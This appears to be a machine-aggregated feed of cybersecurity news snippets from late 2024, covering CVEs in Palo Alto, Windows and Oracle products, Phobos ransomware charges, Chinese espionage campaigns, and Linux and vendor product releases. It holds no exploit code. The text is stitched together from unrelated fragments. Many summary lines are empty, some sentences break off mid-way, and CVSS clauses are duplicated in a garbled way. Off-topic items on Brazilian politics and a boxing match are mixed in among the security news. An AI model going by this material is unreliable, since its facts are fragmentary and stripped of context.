This release is packaged with the following kernel options: Unbreakable Enterprise Kernel (UEK) Release 7 Update 3, 5.15.0-302.167.6 for the x86_64 and aarch64 platforms Red Hat Compatible Kernel (RHCK), 5.14.0-503.11.1 for the x86_64 platform Security OpenSSL updated to version 3.2.2 – This significant update includes enhanced cryptographic operations and optimized RSA public key handling. "Quantum announces the DXi9200, the latest generation of its flagship DXi9000 Series hybrid (flash + dense disk) data protection appliances, designed for scalable, efficient backup and recovery services for large organizations. With the continuing threat of ransomware attacks, organizations need to take a comprehensive and proactive approach to secure their data and data copies, continuously validate recovery operations, and quickly recover in case of attack. As the industry’s most scalable, feature-rich, and efficient data protection … More
The post Quantum DXi9200 helps organizations manage and reduce cybersecurity risks appeared first on Help Net Security.
"Autosummary:
Backup data integrity against alteration, deletion or corruption with offline immutable snapshot data copies, frequent native data integrity health checks, parity-protected RAID, and a compatible ecosystem of data protection and malware scanning software, including Veeam, Veritas, and Commvault. "Autosummary:
"We suspect that the evolution of networks with increasing speed of communication together with a lack of proper time-based detection on ATM/POS terminals made these attacks possible, where the actual devices with cards are physically located far away from the place where transaction is performed (device is not present at PoS or ATM)," ThreatFabric noted. "Autosummary:
The firm"s software services include lending solutions, payment processing, cloud-enabled retail and banking platforms, and trading risk management tools. "Autosummary:
The flaws were discovered by Qualys and are tracked as CVE-2024-48990, CVE-2024-48991, CVE-2024-48992, CVE-2024-10224, and CVE-2024-11003. Needrestart is a utility commonly used on Linux, including on Ubuntu Server, to identify services that require a restart after package updates, ensuring that those services run the most up-to-date versions of shared libraries. "Autosummary:
"Autosummary:
iOS 17.7.2 and iPadOS 17.7.2 – iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later. "The age-old tension between development and security teams has long been a source of friction in organizations. Developers prioritize speed and efficiency, aiming to deliver features and products quickly with a fast-paced, iterative development cycle and move on efficiently. On the other hand, security teams strive to balance risk and innovation but must focus on protecting sensitive data and systems with guardrails and ensuring compliance with stringent regulations. These contrasting priorities and communication gaps lead … More
The post Dev + Sec: A collaborative approach to cybersecurity appeared first on Help Net Security.
"Autosummary:
An organization in which developers and security view their goals as contradictory or, even worse, cease to collaborate altogether, may contend with delayed releases, system downtimes and increased costs – not to mention an acrimonious working environment, decreased morale and growing security risks. Using tools that are designed for developers, not only for security professionals, ensures that security is an inherent concern but part of the developer’s workflow, not an external – and annoying – afterthought. "Autosummary:
The second infection sequence, in contrast, is a lot more sophisticated, with the threat actors abusing susceptible Microsoft Exchange servers to implant the China Chopper web shell, which is then used to deliver Cobalt Strike, Zingdoor, and Snappybee (aka Deed RAT), a suspected successor to the ShadowPad malware.In August 2023, the spy crew was linked to a series of attacks aimed at government and technology industries based in the Philippines, Taiwan, Malaysia, South Africa, Germany, and the U.S. Analysis shows that the threat actors have methodically crafted their payloads and made use of an interesting combination of legitimate and bespoke tools and techniques to bypass defenses and maintain access to their targets. "Autosummary:
"Autosummary:
Smartphone users would be wise to be on their guard, ensuring that their devices are up-to-date with security patches, are running anti-virus protection, and to only install apps from official app stores. "Oracle has released a security patch for CVE-2024-21287, a remotely exploitable vulnerability in the Oracle Agile PLM Framework that is, according to Tenable researchers, being actively exploited by attackers. About CVE-2024-21287 Oracle Agile PLM Framework is an enterprise product lifecycle management solution that enables collaboration between the various teams involved. CVE-2024-21287 affects version 9.3.6 of the Agile PLM Framework – more specifically, the Agile Software Development Kit and the Process Extension components. “This vulnerability is … More
The post Oracle patches exploited Agile PLM vulnerability (CVE-2024-21287) appeared first on Help Net Security.
"Autosummary:
"The Justice Department unsealed criminal charges against Evgenii Ptitsyn, 42, a Russian national, for allegedly administering the sale, distribution, and operation of Phobos ransomware. Ptitsyn made his initial appearance in the US District Court for the District of Maryland on Nov. 4 after being extradited from South Korea. Phobos ransomware, through its affiliates, victimized more than 1,000 public and private entities in the United States and around the world, and extorted ransom payments worth more … More
The post Phobos ransomware administrator faces US cybercrime charges appeared first on Help Net Security.
"Autosummary:
Phobos ransomware suspect charged with 13 crimes Ptitsyn is charged in a 13-count indictment with wire fraud conspiracy, wire fraud, conspiracy to commit computer fraud and abuse, four counts of causing intentional damage to protected computers, and four counts of extortion in relation to hacking. "AlmaLinux is a free, open-source, enterprise-grade Linux distribution. Governed and owned by the community, it offers a production-ready platform with binary compatibility to Red Hat Enterprise Linux. AlmaLinux 9.5, codenamed Teal Serval, is now available. Security updates: The OpenSSL TLS toolkit is upgraded to version 3.2.2. OpenSSL now supports certificate compression extension (RFC 8879) and Brainpool curves have been added to the TLS 1.3 protocol (RFC 8734). The SELinux policy now provides a boolean that … More
The post AlmaLinux 9.5 released: Security updates, new packages, and more! appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Truesec, in an analysis published earlier this month, detailed Helldown attack chains that have been observed making use of internet-facing Zyxel firewalls to obtain initial access, followed by carrying out persistence, credential harvesting, network enumeration, defense evasion, and lateral movement activities to ultimately deploy the ransomware. Interlock is assessed to be a new group that sprang forth from Rhysida operators or developers, the company added, citing overlaps in tradecraft, tools, and ransomware behavior. "Autosummary:
"Hornetsecurity launched DMARC Manager, an advanced tool addresses the complex challenges organisations face in managing DMARC, DKIM, and SPF configurations, especially for those operating across multiple domains. As email threats such as fraud and impersonation attacks continue to rise, the need for robust email authentication practices has never been more critical. DMARC Manager is designed to empower administrators and CISOs by providing an intuitive solution for setting up and maintaining best practices in email authentication. … More
The post Hornetsecurity DMARC Manager protects against fraud and phishing attacks appeared first on Help Net Security.
"Autosummary:
To help prevent fraud, impersonation and phishing attacks, DMARC Manager also identifies suspicious activities, such as unauthorised email traffic being sent in the name of the user’s domains. "Autosummary:
A breakdown of the residential proxy provider"s proxies by device type shows that the botnet operators have targeted a broad spectrum of vendors, including NETGEAR, Uniview, Reolink, Zyxel, Comtrend, SmartRG, Linear Emerge, Hikvision, and NUUO. "Autosummary:
Steal data from WeChat, Line, QQ, DingDing, Skype, Telegram, and Feishu applications.DeepData exploits FortiClient VPN zero-day Pierluigi Paganini November 19, 2024 November 19, 2024 Chinese threat actors use custom post-exploitation toolkit ‘DeepData’ to exploit FortiClient VPN zero-day and steal credentials. "Autosummary:
"Autosummary:
The exposed patient info varied by individual and may include name, demographic information, health insurance information, clinical treatment information, such as diagnosis and medication information, driver’s license number, and/or in some instances, Social Security number. "Autosummary:
Brazil arrests soldiers over "plot to kill" President Lula in 2022 Lula was elected in 2022 and sworn in on 1 January 2023 Lula was elected in October 2022, narrowly defeating incumbent Jair Bolsonaro, who never publicly accepted defeat. "Autosummary:
"Autosummary:
Configuration files similarities Source: Sekoia As of November 7, 2024, the threat group listed 31 victims on its recently-renewed extortion portal, primarily small and medium-sized firms based in the United States and Europe. "Microsoft is enhancing its bug bounty initiatives with the launch of the Zero Day Quest hacking event. With $4 million in potential rewards, it focuses on driving research in critical areas such as cloud computing and AI. Event focus The event invites security researchers to discover and report high-impact vulnerabilities in Microsoft AI and Cloud Bounty Programs: AI, Microsoft Azure, Microsoft Identity, M365, Microsoft Dynamics 365, and Power Platform. “To advance AI security, we will … More
The post Microsoft announces Zero Day Quest hacking event with big rewards appeared first on Help Net Security.
"Autosummary:
"Microsoft has announced the Windows Resiliency Initiative, aimed at avoiding a repeat of the prolonged worldwide IT outage caused by a buggy CrowdStrike update that took down millions of Windows machines and rendered them remotely unfixable. As part of that initiative, the company has announced that its working on Quick Machine Recovery, a feature that “will enable IT administrators to execute targeted fixes from Windows Update on PCs, even when machines are unable to boot, … More
The post Microsoft plans to boot security vendors out of the Windows kernel appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
According to the DoJ, the Phobos ransomware operation targeted over 1,000 public and private entities in the United States and worldwide, extorting more than $16 million in ransom payments “The Justice Department unsealed criminal charges today against Evgenii Ptitsyn, 42, a Russian national, for allegedly administering the sale, distribution, and operation of Phobos ransomware.” "Autosummary:
Magnet Forensics, which offers a data extraction tool called GrayKey, confirmed the "inactivity reboot" feature, stating the trigger is "tied to the lock state of the device" and that "once a device has entered a locked state and has not been unlocked within 72 hours, it will reboot. "Autosummary:
"Autosummary:
🔥 Trending CVEs Recent cybersecurity developments have highlighted several critical vulnerabilities, including: CVE-2024-10924, CVE-2024-10470, CVE-2024-10979, CVE-2024-9463, CVE-2024-9465, CVE-2024-43451, CVE-2024-49039, CVE-2024-8068, CVE-2024-8069, CVE-2023-28649, CVE-2023-31241, CVE-2023-28386, CVE-2024-50381, CVE-2024-7340, and CVE-2024-47574. WIRTE, a Middle Eastern threat actor affiliated with Hamas, has orchestrated cyber espionage operations against the Palestinian Authority, Jordan, Iraq, Saudi Arabia, and Egypt, as well as carried out disruptive attacks that exclusively target Israeli entities using SameCoin wiper.WIRTE Targets Israel With SameCoin Wiper: WIRTE, a Middle Eastern threat actor affiliated with Hamas, has orchestrated cyber espionage operations against the Palestinian Authority, Jordan, Iraq, Saudi Arabia, and Egypt, as well as carried out disruptive attacks that exclusively target Israeli entities using SameCoin wiper.These are fake files, links, or credentials, like "Confidential_Report_2024.xlsx" or a fake AWS key, placed in spots hackers love to snoop—shared drives, admin folders, or cloud storage.URLCrazy is an OSINT tool designed for cybersecurity professionals to generate and test domain typos or variations, effectively detecting and preventing typo squatting, URL hijacking, phishing, and corporate espionage. "Autosummary:
The phishing domains have been found to use top-level domains (TLDs) such as .top, .shop, .store, and .vip, often typosquatting legitimate e-commerce organizations" domain names as a way to lure victims (e.g., northfaceblackfriday[.]shop). "Autosummary:
“T-Mobile is closely monitoring this industry-wide attack, and at this time, T-Mobile systems and data have not been impacted in any significant way, and we have no evidence of impacts to customer information,” a company spokeswoman told WSJ. In September, the Wall Street Journal reported that China-linked APT group Salt Typhoon (also known as FamousSparrow and GhostEmperor) breached U.S. broadband providers, including Verizon, AT&T, and Lumen Technologies, potentially accessing systems for lawful wiretapping and other data. "Palo Alto Networks has released fixes for two vulnerabilities (CVE-2024-0012 and CVE-2024-9474) in its next-generation firewalls that have been exploited by attackers as zero-days. About the vulnerabilities (CVE-2024-0012, CVE-2024-9474) CVE-2024-0012 stems from missing authentication for a critical function and allows unauthenticated attackers with network access to the management web interface “to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474,” according to Palo … More
The post Attackers are exploiting 2 zero-days in Palo Alto Networks firewalls (CVE-2024-0012, CVE-2024-9474) appeared first on Help Net Security.
"Autosummary:
Both vulnerabilities have been fixed in PAN-OS 10.2.12-h2, PAN-OS 11.0.6-h1, PAN-OS 11.1.5-h1, PAN-OS 11.2.4-h1, and all later PAN-OS versions. "Autosummary:
"Ptitsyn and his co-conspirators hacked not only large corporations but also schools, hospitals, nonprofits, and a federally recognized tribe, and they extorted more than $16 million in ransom payments," said Nicole M. Argentieri, the head of the Justice Department"s Criminal Division. "Autosummary:
"Autosummary:
The application that creates it is a program written in Microsoft .NET, which contains two important methods that control when and how the popup appears: MonitorAndShowForm(), which calls CalculateNextDisplayDate and is incremented on week days CheckTimeWindow() to make sure it is a weekday and within a certain time window The text content (fake instructions) can also be seen here, encoded in Base64 presumably to avoid detection from antivirus software: Conclusion This clever scheme has been going for some time now and every now and again we see some people reporting it online, seemingly always via Google ads. "Autosummary:
This includes but is not limited to Dolphin Loader, Emmenhtal, FakeBat, and Hijack Loader, among others, which have been used to propagate various payloads like CryptBot, Lumma Stealer, SectopRAT, SmokeLoader, and Ursnif. "Autosummary:
Information in memory (orange) targeted by DeepData Source: Volexity By compromising VPN accounts, BrazenBamboo can gain initial access to corporate networks, where they can then spread laterally, gain access to sensitive systems, and generally expand espionage campaigns. "Autosummary:
"Autosummary:
"Autosummary:
Recently disclosed VMware vCenter Server bugs are actively exploited in attacks Pierluigi Paganini November 18, 2024 November 18, 2024 Threat actors are actively exploiting two VMware vCenter Server vulnerabilities tracked as CVE-2024-38812 and CVE-2024-38813, Broadcom warns. "Autosummary:
"Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Microsoft fixes actively exploited zero-days (CVE-2024-43451, CVE-2024-49039) November 2024 Patch Tuesday is here, and Microsoft has dropped fixes for 89 new security issues in its various products, two of which – CVE-2024-43451 and CVE-2024-49039 – are actively exploited by attackers. Massive troves of Amazon, HSBC employee data leaked A threat actor who goes by the online moniker “Nam3L3ss” has leaked … More
The post Week in review: Microsoft patches actively exploited 0-days, Amazon and HSBC employee data leaked appeared first on Help Net Security.
"Autosummary:
New infosec products of the week: November 15, 2024 Here’s a look at the most interesting products from the past week, featuring releases from Absolute Security, BlackFog, Eurotech, Nirmata, Rakuten Viber, Syteca, and Vectra. Massive troves of Amazon, HSBC employee data leaked A threat actor who goes by the online moniker “Nam3L3ss” has leaked employee data belonging to a number of corporations – including Amazon, 3M, HSBC and HP – ostensibly compromised during the May 2023 MOVEit hack by the Cl0p ransomware gang, which affected British Airways, the BBC, Aer Lingus, Boots. "Autosummary:
"Autosummary:
For example, the following text will create a rectangle, a circle, a link, and some text: <svg width="200" height="200" xmlns="http://www.w3.org/2000/svg"> <!-- "Autosummary:
"Autosummary:
The victory was a comfortable one for "Zurdo" on the cards, the judges at ringside scoring it 116-112, 116-112 and 116-113. "Autosummary:
The advisory comes as three different critical flaws in the Palo Alto Networks Expedition (CVE-2024-5910, CVE-2024-9463, and CVE-2024-9465) have come under active exploitation, per the U.S. Cybersecurity and Infrastructure Security Agency (CISA). "Autosummary:
The malware first came to light earlier this week, when BlackBerry detailed the Windows-based surveillance framework as used by the China-linked APT41 threat actor to harvest data from WhatsApp, Telegram, Signal, WeChat, LINE, QQ, Skype, Microsoft Outlook, DingDing, Feishu, KeePass, as well as application passwords, web browser information, Wi-Fi hotspots, and installed software. "Autosummary:
"Autosummary:
This week, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following Palo Alto Expedition vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2024-9463 Palo Alto Networks Expedition OS Command Injection Vulnerability CVE-2024-9465 Palo Alto Networks Expedition SQL Injection Vulnerability Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, RCE) "Autosummary:
“As a threshold matter, NSO admits that it developed and sold the spyware described in the Complaint, and that NSO’s spyware—specifically its zero-click installation vector called “Eden,” which was part of a family of WhatsApp-based vectors known collectively as “Hummingbird” (collectively, the “Malware Vectors”)—was responsible for the attacks described in the Complaint. "Autosummary:
Argentina orders arrests of pro-Bolsonaro rioters Scores of Bolsanaro supporters are believed to have fled to Argentina following prosecutions for the January 2023 riots But others fled to Argentina to escape their sentences - particularly after far-right politician Javier Milei was elected president in December 2023. "In this Help Net Security video, Venkat Gopalakrishnan, Principal Data Science Manager at Microsoft, discusses the development of AI-driven risk scoring models tailored for cybersecurity threats, and how AI is revolutionizing risk assessment and management in cybersecurity.
The post Using AI to drive cybersecurity risk scoring systems appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"USX Cyber released advanced phishing protection tools within its GUARDIENT XDR platform. This latest enhancement enables organizations to strengthen defenses against sophisticated phishing attacks by providing employees with realistic training and heightened awareness of phishing threats. Phishing attacks are growing increasingly sophisticated and dangerous as threat actors exploit social engineering techniques and AI to enhance their tactics. The new suite includes a phishing simulation tool that mimics real-world phishing techniques, equipping employees to identify and respond … More
The post USX Cyber strengthens phishing defense in GUARDIENT XDR appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Hijacking domains using a ‘Sitting Ducks attack’ remains an underrecognized topic in the cybersecurity community. Few threat researchers are familiar with this attack vector, and knowledge is scarce. However, the prevalence of these attacks and the risk to organizations are significant. Infoblox researchers estimate that over 1 million registered domains could be vulnerable daily. More evidence found on Sitting Ducks Attacks During a Sitting Ducks attack, the malicious actor gains control of a domain by … More
The post Cybercriminals hijack DNS to build stealth attack networks appeared first on Help Net Security.
"Autosummary:
This actor uses hijacked domains to augment their malicious traffic distribution system (TDS) called 404TDS to run malicious spam operations, deliver porn, establish remote access trojan (RAT) C2s, and drop malware such as DarkGate and AsyncRAT. "Cyber crooks are trying out an interesting new approach for getting information-stealing malware installed on Android users’ smartphones: a physical letter impersonating MeteoSwiss (i.e., Switzerland’s Federal Office of Meteorology and Climatology). “The letter asks the recipients to install a new severe weather app. However, there is no such federal app with the name mentioned. Rather, the QR code shown in the letter leads to the download of malware called ‘Coper’ (also known as ‘Octo2’),” the … More
The post Cyber crooks push Android malware via letter appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Below are the descriptions of the flaws addressed by the security firm: CVE-2024-9463 (CVSS 9.9) – A command injection vulnerability in Palo Alto Networks’ Expedition allows unauthenticated attackers to execute OS commands as root, exposing usernames, passwords, configurations, and API keys of PAN-OS firewalls. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following Palo Alto Networks Expedition vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2024-9463 Palo Alto Networks Expedition OS Command Injection Vulnerability CVE-2024-9465 Palo Alto Networks Expedition SQL Injection Vulnerability Last week, Palo Alto Networks addressed multiple vulnerabilities that an attacker can chain to hijack PAN-OS firewalls. "Autosummary:
"Autosummary:
Shodan map of exposed Palo Alto management interfaces Source: Shodan To ensure that you have applied the mitigations properly, visit the Assets section of the Palo Alto Networks Customer Support Portal to find a list of devices with Internet-facing management interfaces, and look for devices tagged with "PAN-SA-2025-0015." "Autosummary:
If you do not trust the URL, don’t allow your device to open the link and, if necessary, research to find another, more trustworthy, way to get the information or download you want. For most phones it works like this: Under About phone or About device you can tap on Software updates to check if there are new updates available for your device, although there may be slight differences based on the brand, type, and Android version of your device. "Autosummary:
" Attack chains, per the government authorities, involve the use of trojanized Google Chrome installers ("Google Chrome Installer.msi") that, in addition to installing the legitimate Chrome web browser, is configured to run a second binary named "Updater.exe" (internally called "bd.exe"). "Autosummary:
Most of the exposed devices (9,100) are based in the United States, followed by Germany (1,600), Canada (800), Taiwan (800), Japan (350), Spain (300), and France (250). "Autosummary:
"As a threshold matter, NSO admits that it developed and sold the spyware described in the Complaint, and that NSO"s spyware—specifically its zero-click installation vector called "Eden," which was part of a family of WhatsApp-based vectors known collectively as "Hummingbird" (collectively, the "Malware Vectors")—was responsible for the attacks," the court documents reveal. "Autosummary:
"A joint report by leading cybersecurity agencies from the U.S., UK, Canada, Australia, and New Zealand has identified the most commonly exploited vulnerabilities of 2023. Zero-day vulnerabilities on the rise The advisory highlights that malicious cyber actors increasingly targeted zero-day vulnerabilities, posing significant threats to enterprise networks. Notably, the exploitation of these zero-days rose compared to 2022. Unlike previous years, where older, unpatched vulnerabilities dominated the list, 2023 saw a spike in zero-day exploits, reflecting … More
The post Zero-days dominate top frequently exploited vulnerabilities appeared first on Help Net Security.
"Autosummary:
Unlike previous years, where older, unpatched vulnerabilities dominated the list, 2023 saw a spike in zero-day exploits, reflecting the evolving tactics of threat actors who aim to compromise high-priority targets quickly after vulnerabilities are disclosed. "Security leaders feel under increasing pressure to provide assurances around cybersecurity, exposing them to greater personal risk – yet many lack the data and resources to accurately report and close cybersecurity gaps, according to Panaseer. The report analyses the findings of a survey of 400 security decision makers (SDMs) across the US and UK. Security leaders turn to indemnity insurance for protection 61% of organizations have suffered a security breach in the past year because … More
The post How cybersecurity failures are draining business budgets appeared first on Help Net Security.
"Autosummary:
Furthermore, 89% of security leaders are expected to provide more data around the role and effectiveness of security investments – with 76% saying they are under greater pressure to provide metrics to justify cyber RoI. However, 67% say cybersecurity teams are not equipped with the specialized analytical tools needed to provide these assurances to boards and regulators.Armed with this golden source of truth, CISOs are empowered to provide assurances, report risk in good faith, discover gaps in security and plug them before a security incidents take place, protecting both themselves and their company.” "Red Hat announced Red Hat Enterprise Linux 9.5. Red Hat Enterprise Linux helps organizations deploy applications and workloads more quickly and with greater reliability, enabling them to lower costs and more effectively manage workloads across hybrid cloud deployments while mitigating IT risks, from the datacenter to public clouds to the edge. According to IDC, “Organizations continue to find themselves at odds with striking the balance between maintaining their Linux operating system environments and the workloads … More
The post Red Hat Enterprise Linux 9.5 helps organizations simplify operations appeared first on Help Net Security.
"Autosummary:
In addition, Red Hat Enterprise Linux 9.5 now offers new file management capabilities to the web console, allowing users to perform routine file management tasks without using the command line, such as browsing the file system, uploading and downloading files, changing permissions and creating directories.They further called out the value of automation, better scalability and access to Red Hat Enterprise Linux expertise,” said Greg Macatee, research manager, Infrastructure Software Platforms, Worldwide Infrastructure Research, IDC. "Google Cloud unveiled its Cybersecurity Forecast for 2025, offering a detailed analysis of the emerging threat landscape and key security trends that organizations worldwide should prepare for. The report delivers insights into the tactics of cyber adversaries, providing advice for increasing security posture in the coming year. The year of AI-driven cyberattacks The report highlights a shift in the cybersecurity landscape: the rise of artificial intelligence (AI) as a double-edged sword. While AI offers new … More
The post Google Cloud Cybersecurity Forecast 2025: AI, geopolitics, and cybercrime take centre stage appeared first on Help Net Security.
"Autosummary:
Key recommendations: Prioritize cloud security: Organisations should embrace cloud-native security solutions, such as cloud-based SIEM and SOAR platforms, to improve visibility, threat detection, and incident response capabilities. “2025 is going to be the year when AI moves from pilots and prototypes into large-scale adoption,” Phil Venables, VP, TI Security & CISO, Google Cloud, added. "Autosummary:
"Minimal interaction with a malicious file by a user such as selecting (single-click), inspecting (right-click), or performing an action other than opening or executing could trigger this vulnerability," Microsoft revealed in its advisory. "Autosummary:
In the initial phase, Babatunde Francis Ayeni and his criminal gang targeted US title companies, real estate agents, and real estate attorneys. "Google has announced new security features for Android that provide real-time protection against scams and harmful apps. These features, powered by advanced on-device AI, enhance user safety without compromising privacy. These new security features are available first on Pixel and are coming soon to more Android devices. Scam Detection One of the key features is Scam Detection, which leverages on-device AI to identify potential scam calls in real-time. This feature analyzes conversation patterns to detect … More
The post Google launches on-device AI to alert Android users of scam calls in real-time appeared first on Help Net Security.
"Autosummary:
Scam Detection One of the key features is Scam Detection, which leverages on-device AI to identify potential scam calls in real-time. "After months of news reports that Chinese threat actors have breached the networks of US telecommunications and internet service providers, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) have confirmed the success of the attacks, which were part of a “broad and significant cyber espionage campaign.” “Specifically, we have identified that PRC-affiliated actors have compromised networks at multiple telecommunications companies to enable the theft of customer call records data, the compromise of private … More
The post FBI confirms China-linked cyber espionage involving breached telecom providers appeared first on Help Net Security.
"Autosummary:
"CVE-2024-43451, a Windows zero-day vulnerability for which Microsoft released a fix on November 2024 Patch Tuesday, has been exploited since at least April 2024, ClearSky researchers have revealed. About the vulnerability CVE-2024-43451 affects all supported Windows versions and, when triggered, discloses a user’s NTLMv2 hash to the attacker, who can then use it to either mount pass the hash attacks or extract the user’s password from the hash. The result is in both cases the … More
The post How a Windows zero-day was exploited in the wild for months (CVE-2024-43451) appeared first on Help Net Security.
"Autosummary:
“On Windows 7, 8, and 8.1, the file did not initiate communication when dragged or deleted, unless the target folder was open at the time of dragging (this did not happen on the first attempt but was observed only after 2-3 attempts),” they found. "Autosummary:
According to IBM X-Force Threat Intelligence Index 2024, cyberattacks involving valid stolen or compromised credentials rose by over 70% year-over-year.[3] To better protect your SaaS data from ransomware, consider implementing these key recommendations: Implement third-party backup solutions that are purpose-built for SaaS environments.Regular application-level recovery tests help identify hidden issues like data corruption, configuration errors, or dependency failures, which can prevent applications from running smoothly post-recovery.Today, SaaS apps, such as Google Workspace, Microsoft 365 and Salesforce, hold large volumes of business-critical data. Insufficient recovery testing can result in prolonged downtime, failed recoveries, loss of critical data and operational disruption, impacting business continuity and escalating costs associated with restoring services.Whether your organization"s critical data is stored on on-premises data centers, in the cloud, within SaaS applications or on endpoints, Unitrends protects it all. "Autosummary:
Which is great if your laptop is stolen by a thief... ...but not so good if ShrinkLocker is the one that"s chosen to scramble your data with Bitlocker, and not told you the password it used. "Autosummary:
Some of the other recent tactics adopted by fraudsters and cybercriminals are listed below - Misuse of artificial intelligence (AI) tools to create deepfakes of public figures, taking advantage of their credibility and reach to conduct investment fraud Using hyper-realistic impersonation for bogus crypto investment schemes App and landing page clone scams that dupe users into visiting lookalike pages of their legitimate counterparts, leading to credential or data theft, malware downloads, and fraudulent purchases Capitalizing on major events and combining them with AI to defraud people or promote non-existent products and services Google told The Hacker News that it intends to release such advisories about online fraud and scams every six months as part of its efforts to raise awareness about the risks. "Autosummary:
"Upon executing the application, the Tauri application attempts to render a HTML webpage using a WebView," Group-IB security researcher Sharmine Low said. "Autosummary:
It"s also capable of stealing cryptocurrency wallets from browser extensions, 2FA session tokens from Google, Microsoft, Aegis, and LastPass authenticator apps, password data from Bitwarden, LastPass, and KeePass, as well as emails from mail clients like Thunderbird. "Autosummary:
"Autosummary:
China-linked threat actors compromised multiple telecos and spied on a limited number of U.S. government officials Pierluigi Paganini November 14, 2024 November 14, 2024 China-linked threat actors breached U.S. broadband providers and gained access to private communications of a limited number of U.S. government officials. "Autosummary:
Bitdefender released a decryptor for the ShrinkLocker ransomware Pierluigi Paganini November 14, 2024 November 14, 2024 Bitdefender released a decryptor for the ShrinkLocker ransomware, which modifies BitLocker configurations to encrypt a system’s drives. Proactive monitoring of Windows event logs, specifically from the “Microsoft-Windows-BitLocker-API/Management” source, can help organizations detect early stages of BitLocker attacks, such as when attackers test encryption capabilities. "Autosummary:
Jair Bolsonaro’s adviser, Fabio Wajngarten, wrote on X: “There are crazy people everywhere, across all political spectrums, supporters of all teams, of all beliefs and religions.” "Whether you’re looking to enhance your existing cybersecurity skills or just beginning your journey in the field, cybersecurity offers a wide range of career opportunities. If you’re considering a career shift, exploring new job opportunities, or aiming to upgrade your skill set, take time to learn about the questions to prepare for in your upcoming cybersecurity job interview. Preparing for the job interview Researching the potential employer will enable you to answer questions in ways … More
The post Tips for a successful cybersecurity job interview appeared first on Help Net Security.
"Autosummary:
Explain the concept of a secure password Discuss the importance of disaster recovery planning in cybersecurity Discuss the role of artificial intelligence in cybersecurity Explain the concept of micro-segmentation in network security Explain the concept of federated identity management Final cybersecurity interview questions Companies typically use final interviews to address any remaining questions and assess which finalist is the best fit for the role, team, and company. "North American financial institutions fielded 10 times more reports of social engineering scams in 2024 than they did a year ago, according to BioCatch. The data shows scams now represent 23% of all digital banking fraud. Growing danger of deepfake and GenAI scams BioCatch published these findings in its 2024 Digital Banking Fraud Trends in North America report, which also details a 94% uptick in reported money mule (or money laundering) accounts. “Reports of North … More
The post Social engineering scams sweep through financial institutions appeared first on Help Net Security.
"Autosummary:
“As we outlined in our 2024 AI, Fraud, and Financial Crime Survey and ScamGPT white paper, AI is super-charging fraud,” said BioCatch Global Advisory Director Seth Ruden. "Autosummary:
TA455, also tracked by Google-owned Mandiant as UNC1549 and Yellow Dev 13, is assessed to be a sub-cluster within APT35, which is known by the names CALANQUE, Charming Kitten, CharmingCypress, ITG18, Mint Sandstorm (formerly Phosphorus), Newscaster, TA453, and Yellow Garuda. "Autosummary:
The highest-rated vulnerability in this month"s release is a remote code execution flaw in Azure CycleCloud (CVE-2024-43602, CVSS score: 9.9), which allows an attacker with basic user permissions to gain root-level privileges. "Attackers continue to be adamant about discovering and exploiting zero-day vulnerabilities that can disclose NTLMv2 hashes, as they can be used to authenticate to systems and potentially move laterally within a network to access other systems," Satnam Narang, senior staff research engineer at Tenable, said in a statement. "Autosummary:
The most severe of the flaws are listed below - CVE-2023-28649 (CVSS v4 score: 9.2), which allows an attacker to impersonate a hub and hijack a device (CVSS v4 score: 9.2), which allows an attacker to impersonate a hub and hijack a device CVE-2023-31241 (CVSS v4 score: 9.2), which allows an attacker to claim arbitrary unclaimed devices by bypassing the requirement for a serial number (CVSS v4 score: 9.2), which allows an attacker to claim arbitrary unclaimed devices by bypassing the requirement for a serial number CVE-2023-28386 (CVSS v4 score: 9.2), which allows an attacker to upload arbitrary firmware updates resulting in code execution (CVSS v4 score: 9.2), which allows an attacker to upload arbitrary firmware updates resulting in code execution CVE-2024-50381 (CVSS v4 score: 9.1), which allows an attacker to impersonate a hub and unclaim devices arbitrarily and subsequently exploit other flaws to claim it "With more devices coming online every day and cloud management becoming the dominant means of configuring and accessing services, more than ever, the impetus is on manufacturers and cloud service providers to secure these devices and connections," Katz said. "Autosummary:
In a report today, Bitdefender highlights a ShrinkLocker attack against a healthcare organization where attackers encrypted Windows 10, Windows 11, and Windows Server devices across the network, including backups. "Researchers discovered GoIssue, a new phishing tool targeting GitHub users, designed to extract email addresses from public profiles and launch mass email attacks. Marketed on a cybercrime forum, GoIssue allows attackers to send bulk emails while keeping their identity hidden using proxies. The tool’s capabilities extend beyond simple phishing, posing a threat to entire organizations by potentially hijacking developer accounts and accessing private repositories. GoIssue may be linked to the GitLoker extortion campaign, which uses … More
The post GoIssue phishing tool targets GitHub developer credentials appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Even if the server is rebooted manually (e.g. by an unsuspecting administrator), the script does not have a mechanism to resume its execution after the reboot, meaning that the attack may be interrupted or prevented," Martin Zugec, technical solutions director at Bitdefender, said. "Autosummary:
FOFA scan for exposed D-Link NAS devices (Netsecfish) While Shadowserver said it spotted just over Internet-exposed 1,100 D-Link NAS devices, Netsecfish said it found over 41,000 unique IP addresses online used by vulnerable devices in an Internet scan with Huashun Xin"an"s FOFA platform. "Autosummary:
" Anti-stalkerware system The second feature is the new "Live Threat Detection" in Google Play Protect, Android"s default anti-malware and security tool that protects users in real-time. "Autosummary:
"Autosummary:
"Minimal interaction with a malicious file by a user such as selecting (single-click), inspecting (right-click), or performing an action other than opening or executing could trigger this vulnerability. "Autosummary:
